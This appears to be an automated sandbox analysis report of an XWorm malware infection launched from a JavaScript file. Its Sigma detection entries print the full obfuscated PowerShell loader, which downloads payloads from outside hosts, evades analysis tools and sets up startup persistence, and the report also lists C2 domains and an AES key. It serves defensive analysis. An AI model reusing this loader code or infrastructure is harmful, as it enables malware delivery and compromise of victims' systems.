Author: frack113, Florian Roth (Nextron Systems): Data: Details: cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7668, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_lme

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\user\Desktop\DEVIS_VALIDE.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DEVIS_VALIDE.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DEVIS_VALIDE.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DEVIS_VALIDE.js", ProcessId: 7136, ProcessName: wscript.exe

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: cmd.exe /c mkdir "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\", CommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\dll03.ps1, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6536, ParentProcessName: powershell.exe, ProcessCommandLine: cmd.exe /c mkdir "C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\", ProcessId: 4484, ProcessName: cmd.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + '2AHgAYg' + [char]66 + 'DAHgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + '4AGIAQw' + [char]66 + '4ACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAKQAgAHsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAKAAkAGoAaw' + [char]66 + '3AGoAegAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGoAaw' + [char]66 + '3AGoAegAgAD0AIAAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66

Sigma detected: Potential Encoded PowerShell Patterns In CommandLine

Source: Process started

Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$jkwjz = ($jkwjz + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$jkwjz = ($jkwjz + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$cxpfd = ( New-Object Net.WebClient ) ;$cxpfd.Encoding = [System.Text.Encoding]::UTF8 ;$cxpfd.DownloadFile($jkwjz, ($HzOMj + '\Upwin.msu') ) ;$tpWkF = ( 'C:\Users\' + [Environment]::UserName );HhXHB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe HhXHB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DEVIS_VALIDE.js' -Destination ( $tpWkF + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$jlcqj = ('ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter' + '/02/DLL01.txt' );$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$OjrRP = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($OjrRP, $lllGq) ;$RVUXv = $webClient.DownloadString( $jlcqj ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''?:?'',''A'') ) ;' ;$MODRg += '[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\user\Desktop\DEVIS_VALIDE.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$vxbCx = $host.Version.Major.Equals(2);If ( $vxbCx ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$jkwjz = 'https://drive.google.com/uc?export=download&id=';$PiUQb = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $PiUQb ) {$

Sigma detected: PowerShell Script Dropped Via PowerShell.EXE

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5764, TargetFilename: C:\Users\user\AppData\Local\Temp\dll03.ps1

Persistence and Installation Behavior

Sigma detected: Copy file to startup via Powershell

Source: Process started

Suricata Signatures

ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T11:06:28.350868+0100	2020424	1	Exploit Kit Activity Detected	64.235.43.128	443	192.168.2.4	49740	TCP

ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T11:06:28.351122+0100	2057635	1	A Network Trojan was detected	64.235.43.128	443	192.168.2.4	49740	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T11:06:30.279287+0100	2803305	3	Unknown Traffic	192.168.2.4	49745	188.114.97.3	443	TCP

ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T11:06:28.351122+0100	2858295	1	A Network Trojan was detected	64.235.43.128	443	192.168.2.4	49740	TCP

ETPRO MALWARE Terse Request to paste .ee - Possible Download

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T11:06:16.473510+0100	2841075	1	Malware Command and Control Activity Detected	192.168.2.4	49732	188.114.97.3	443	TCP
2024-11-20T11:06:25.302670+0100	2841075	1	Malware Command and Control Activity Detected	192.168.2.4	49735	188.114.97.3	443	TCP
2024-11-20T11:06:30.279287+0100	2841075	1	Malware Command and Control Activity Detected	192.168.2.4	49745	188.114.97.3	443	TCP

ETPRO MALWARE Win32/XWorm Checkin via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T11:06:38.436081+0100	2853685	1	A Network Trojan was detected	192.168.2.4	49747	149.154.167.220	443	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T11:06:44.439264+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:06:46.947582+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:06:49.466115+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:06:54.489860+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:06:57.362156+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:06:59.437255+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:04.456968+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:09.440499+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:11.197817+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:14.437605+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:16.937308+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:19.447936+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:24.442487+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:25.336716+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:29.439700+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:34.451068+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:38.894734+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:39.489750+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:44.607133+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:46.958639+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:47.672058+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:49.441933+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:54.439189+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:59.441482+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:01.523369+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:04.443474+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:09.442153+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:11.107005+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:14.435993+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:16.939791+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:19.435970+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:24.452045+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:25.143354+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:27.966603+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:29.464679+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:34.449141+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:39.448894+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:41.802067+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:44.452418+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:46.939506+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:49.460204+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:54.523128+0100	2852870	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T11:06:57.371514+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49749	178.73.218.6	7000	TCP
2024-11-20T11:07:11.199690+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49749	178.73.218.6	7000	TCP
2024-11-20T11:07:25.384167+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49749	178.73.218.6	7000	TCP
2024-11-20T11:07:38.896741+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49749	178.73.218.6	7000	TCP
2024-11-20T11:07:47.674648+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49749	178.73.218.6	7000	TCP
2024-11-20T11:08:01.527072+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49749	178.73.218.6	7000	TCP
2024-11-20T11:08:11.108897+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49749	178.73.218.6	7000	TCP
2024-11-20T11:08:25.146422+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49749	178.73.218.6	7000	TCP
2024-11-20T11:08:27.968545+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49749	178.73.218.6	7000	TCP
2024-11-20T11:08:41.803711+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49749	178.73.218.6	7000	TCP

ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T11:06:46.947582+0100	2852874	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:16.937308+0100	2852874	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:07:46.958639+0100	2852874	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:16.939791+0100	2852874	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP
2024-11-20T11:08:46.939506+0100	2852874	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T11:06:57.034266+0100	2855924	1	Malware Command and Control Activity Detected	192.168.2.4	49749	178.73.218.6	7000	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T11:06:48.990965+0100	2853191	1	Malware Command and Control Activity Detected	178.73.218.6	7000	192.168.2.4	49749	TCP

ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T11:06:48.669002+0100	2853192	1	Malware Command and Control Activity Detected	192.168.2.4	49749	178.73.218.6	7000	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://ftp.desckvbrat.com.br	Avira URL Cloud: Label: malware
Source: http://desckvbrat.com.br	Avira URL Cloud: Label: malware
Source: moneyluckwork.ddns.net	Avira URL Cloud: Label: malware
Source: moneyluck.duckdns.org	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0000002C.00000002.2333261639.0000015586871000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["moneyluckwork.ddns.net", "moneyluck.duckdns.org"], "Port": 7000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Sample uses string decryption to hide its real strings

Source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack	String decryptor: moneyluckwork.ddns.net,moneyluck.duckdns.org
Source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack	String decryptor: 7000
Source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack	String decryptor: <123456789>
Source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack	String decryptor: <Xwormmm>
Source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack	String decryptor: XWorm V5.6
Source: 53.2.powershell.exe.1d3333e0230.0.raw.unpack	String decryptor: USB.exe

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.235.43.128:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49780 version: TLS 1.2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\catroot2	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\System32\AppxSip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\e9e64b91c0e4559f01e50ac43ffb9a2a\System.DirectoryServices.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SYSTEM32\OpcServices.DLL	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\System32\wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe	Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 178.73.218.6:7000 -> 192.168.2.4:49749
